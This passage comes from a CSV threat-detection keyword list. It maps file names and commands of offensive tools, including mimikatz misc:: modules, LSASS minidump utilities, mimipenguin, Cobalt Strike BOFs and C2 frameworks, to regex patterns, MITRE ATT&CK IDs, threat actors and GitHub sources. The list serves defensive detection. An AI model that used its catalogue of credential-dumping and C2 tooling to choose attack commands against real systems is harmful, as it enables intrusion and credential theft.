- T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" 
"*mimipenguin.git*",".{0,1000}mimipenguin\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MimiPenguin.json*",".{0,1000}MimiPenguin\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*mimipenguin.py*",".{0,1000}mimipenguin\.py.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is 
an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*mimipenguin.sh*",".{0,1000}mimipenguin\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*mimipenguin.so*",".{0,1000}mimipenguin\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipenguin_x32.so*",".{0,1000}mimipenguin_x32\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipy.py*",".{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*mimiRatz*",".{0,1000}mimiRatz.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*mimishim.*",".{0,1000}mimishim\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimispool.dll*",".{0,1000}mimispool\.dll.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*MimiTickets\*-Tickets.txt*",".{0,1000}MimiTickets\\.{0,1000}\-Tickets\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*minidump*minikerberos*",".{0,1000}minidump.{0,1000}minikerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*minidump.* lsass.dmp*",".{0,1000}minidump\..{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*Minidump.exe*",".{0,1000}Minidump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*minidump.exe*",".{0,1000}minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*Minidump.sln*",".{0,1000}Minidump\.sln.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*minidump_add_memory_block*",".{0,1000}minidump_add_memory_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*minidump_add_memory64_block*",".{0,1000}minidump_add_memory64_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*minidumptomemsharp.lsa.lsaproviderduper.boo*",".{0,1000}minidumptomemsharp\.lsa\.lsaproviderduper\.boo.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass 
handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*minidumpwritedump*",".{0,1000}minidumpwritedump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*MiniDumpWriteDump*",".{0,1000}MiniDumpWriteDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*minikerberos.zip*",".{0,1000}minikerberos\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*mirrors.aliyun.com/parrot*",".{0,1000}mirrors\.aliyun\.com\/parrot.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*misc::aadcookie*",".{0,1000}misc\:\:aadcookie.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::clip*",".{0,1000}misc\:\:clip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::cmd*",".{0,1000}misc\:\:cmd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::compress*",".{0,1000}misc\:\:compress.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::detours*",".{0,1000}misc\:\:detours.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::efs*",".{0,1000}misc\:\:efs.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::lock*",".{0,1000}misc\:\:lock.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::memssp*",".{0,1000}misc\:\:memssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::mflt*",".{0,1000}misc\:\:mflt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::ncroutemon*",".{0,1000}misc\:\:ncroutemon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::ngcsign*",".{0,1000}misc\:\:ngcsign.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
